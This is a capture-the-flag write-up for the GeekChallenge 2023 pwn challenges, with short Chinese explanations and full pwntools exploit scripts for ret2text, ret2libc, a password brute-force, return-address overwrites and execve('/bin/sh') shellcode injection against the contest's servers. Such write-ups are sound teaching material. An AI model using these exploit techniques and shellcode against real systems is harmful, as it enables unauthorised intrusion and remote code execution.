
GeekChallenge 2023 wp pwn 部分题解

nc pwntools

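import ast
import operator

from pwn import *

p = remote("pwn.node.game.sycsec.com", 31441)
context(arch="amd64", os="linux", log_level="debug")

# Operators accepted when evaluating the arithmetic question the service sends.
# The original script passed the received text straight to eval(); anything
# arriving on the socket is untrusted, and eval() would run it as Python on
# the solver's own machine. Parsing it as arithmetic only closes that hole.
_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod,
    ast.Pow: operator.pow,
}
_UNARY_OPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}


def _safe_arith(expr):
    """Evaluate a plain numeric expression (literals and + - * / // % **) without eval().

    Args:
        expr: the expression text as str or bytes, e.g. b"12 + 7 * 3".

    Returns:
        The numeric result as int or float, matching what eval() yields for the
        same operators, so the reply sent to the service is unchanged.

    Raises:
        ValueError: if the text contains anything but numbers and the operators above.
        SyntaxError: if the text does not parse as a Python expression.
    """
    if isinstance(expr, bytes):
        expr = expr.decode()

    def walk(node):
        # Only int/float literals (bool is excluded on purpose), binary and
        # unary arithmetic on them; names, calls, attributes etc. are rejected.
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)) \
                and not isinstance(node.value, bool):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
            return _UNARY_OPS[type(node.op)](walk(node.operand))
        raise ValueError("refusing to evaluate non-arithmetic input: %r" % (expr,))

    tree = ast.parse(expr.strip(), mode="eval")
    return walk(tree.body)


# Stage 1: the service asks for a 100-character string; 92 filler bytes plus
# the 8-byte tail the original script uses.
pd1 = b'a' * 92 + b'\x53\x79\x63\x6c\x6F\x76\x65\x72'
p.recvuntil(b'This string need to be 100 characters long')

p.send(pd1)

# Stage 2: the service prints an arithmetic question ending in '='; answer it.
p.recvuntil(b'2.This challenge is harder than first one')
calc = p.recvuntil(b'=', drop=True)
# calc is untrusted network input: parse it as arithmetic, never eval() it.
p.sendline(str(_safe_arith(calc)))

p.interactive()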

ret2text

开了 PIE，但地址的最后三位（十六进制）不变，所以直接改写返回地址的最后一个字节就可以跳转到 backdoor

from pwn import *
context(arch="amd64", os="linux", log_level="debug")
p = remote("pwn.node.game.sycsec.com", 31396)

# Per the writeup: PIE is enabled, but the low three hex digits of a code
# address are fixed, so only the lowest byte of the saved return address is
# replaced. 0x58 bytes of filler precede it.
filler = b'a' * (0x50 + 8)
last_byte = b'\x27'
pd = filler + last_byte
p.send(pd)

p.interactive()

ret2libc

先泄露 gets 的地址；需要在附件二进制中找到 mov_edx_edi_eax 这个 gadget 片段，其他步骤都很常规

from pwn import *
context(arch="amd64",os="linux",log_level="debug")
p=remote("pwn.node.game.sycsec.com",30616)
# Local copies of the challenge binary and its libc (paths are the author's own).
elf=ELF("/home/feichai/ctf_file/chal")
libc=ELF("/home/feichai/ctf_file/libc.so.6")

write_plt = elf.plt.write   # NOTE: resolved but not referenced below
gets_got = elf.got.gets
vuln = elf.sym.vuln         # NOTE: resolved but not referenced below

# Gadget addresses from the binary. The writeup notes that mov_edx_edi_eax is
# the one that has to be located by hand; the pop gadgets are the usual ones.
pop_rdi = 0x0000000000401333
pop_rsi_r15 = 0x0000000000401331
mov_edx_edi_eax = 0x0000000000401288

# 24 bytes of filler up to the saved return address. The \x00 after the first
# byte is deliberate in the original; what it satisfies depends on the binary,
# which is not shown here.
offset = b'a\x00' + b'a' * (0x10 + 6)

# Chain 1 (leak): rsi <- gets@got, r15 <- 1, then the mov edx,edi/eax gadget.
# Per the writeup this leaks the runtime address of gets; how the gadget reaches
# a write() call and how control comes back for a second input is inside the
# binary and cannot be confirmed from this script alone.
pd = offset
pd += p64(pop_rsi_r15) + p64(gets_got) + p64(1)
pd += p64(mov_edx_edi_eax)

p.sendlineafter(b"This challenge no backdoor!",pd)

# The first 8 bytes of the reply are taken as the leaked pointer.
gets_addr = u64(p.recv()[:8])
info("gets_addr:%#x",gets_addr)

# Rebase libc from the leak and derive system and a "/bin/sh" string address.
libc_base = gets_addr - libc.symbols[b'gets']
libc_system = libc_base + libc.symbols[b'system']
bin_sh_addr = libc_base + next(libc.search(b'/bin/sh'))

# Chain 2: rdi <- "/bin/sh", return into system.
pd2 = offset + p64(pop_rdi) + p64(bin_sh_addr) + p64(libc_system)
p.sendlineafter(b"This challenge no backdoor!",pd2)

p.interactive()

password

直接爆破：密码是随机数，其第一个字节有 256 种可能；脚本每次发送空密码，爆破到随机数的第一个字节恰好为 \x00 时就通了

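#coding=utf-8
from pwn import *
context(arch="amd64", os="linux", log_level="debug")

backdoor = 0x4012F3  # backdoor address noted in the writeup

# The password is random; per the writeup only its first byte matters, so an
# empty password is accepted once that byte happens to be \x00 (about 256
# connections on average). The loop below re-connects until the service stops
# answering "Wrong". As extracted, the loop body had lost its indentation and
# every failed connection was left open; both are fixed here.
res = b'Wrong'
attempts = 0
while b'Wrong' in res:
    attempts += 1
    p = remote("pwn.node.game.sycsec.com", 30542)
    p.recvuntil(b"please enter user name:")
    # 0x28 bytes of filler, then the backdoor address (the writeup's layout;
    # presumably this lands on the saved return address).
    pd = b'a' * (0x20 + 8) + p64(backdoor)
    p.sendline(pd)

    p.recvuntil(b"please enter password:")
    p.sendline(b'')
    res = p.recv(10)
    if b'Wrong' in res:
        # Release the socket before the next attempt so a long brute-force
        # run does not exhaust file descriptors.
        p.close()

info("accepted after %d attempt(s)", attempts)
p.interactive()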

write1

第一个 scanf 传什么都无所谓，随便传；然后利用 for 循环内的指针改写返回地址

#coding=utf-8
from pwn import *
context(arch="amd64", os="linux", log_level="debug")
p = remote("pwn.node.game.sycsec.com", 31848)

return_addr = 0x40134D  # original return address noted in the writeup (informational only)
backdoor = 0x401225     # backdoor address noted in the writeup (informational only)

# First scanf input: per the writeup its contents do not matter.
pd = b'\x11\x22\x33\x44\x55\x66\x77\x88'
p.sendline(pd)


def _write_slot(index, value):
    """Answer one index/value round of the service's write loop."""
    p.recvuntil(b"index:")
    p.sendline(index)
    p.recvuntil(b"value:")
    p.sendline(value)


# Two writes through the loop's pointer patch the return address; the exact
# arithmetic the service applies to these values is not visible here.
_write_slot(b'40', b'-28')
_write_slot(b'41', b'-1')

# A negative index presumably ends the service's write loop.
p.recvuntil(b"index:")
p.sendline(b'-1')

p.interactive()

write2

第一个 scanf 传入 shellcode，再把返回地址改为 shellcode 的地址

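from pwn import *
context(arch="amd64", os="linux", log_level="debug")
p = remote("pwn.node.game.sycsec.com", 31409)

# Shellcode from the writeup; it goes in as the first scanf input.
shellcode = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"

# The service prints the address of its index variable as 12 hex digits; the
# writeup places the shellcode 4 bytes past it.
p.recvuntil(b"index_addr:0x")
v1_addr = int(p.recv(12), 16) + 4
v2_addr = hex(v1_addr)[2:]  # hex digits without the 0x prefix
info("v2_addr:%s", v2_addr)

p.sendline(shellcode)

# Write the address back two hex digits at a time, lowest byte first, into
# slots 40..45. The slice assumes v2_addr is exactly 12 characters long —
# TODO confirm for the target's address range. As extracted, this loop body
# had lost its indentation; the index is also computed with integer
# arithmetic now instead of int(40 + i/2).
for i in range(0, 11, 2):
    p.recvuntil(b"index:")
    p.sendline(str(40 + i // 2))

    p.recvuntil(b"value:")
    p.sendline(v2_addr[10 - i:12 - i])

# A negative index presumably ends the service's write loop (same as write1).
p.recvuntil(b"index:")
p.sendline(b'-1')

p.interactive()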
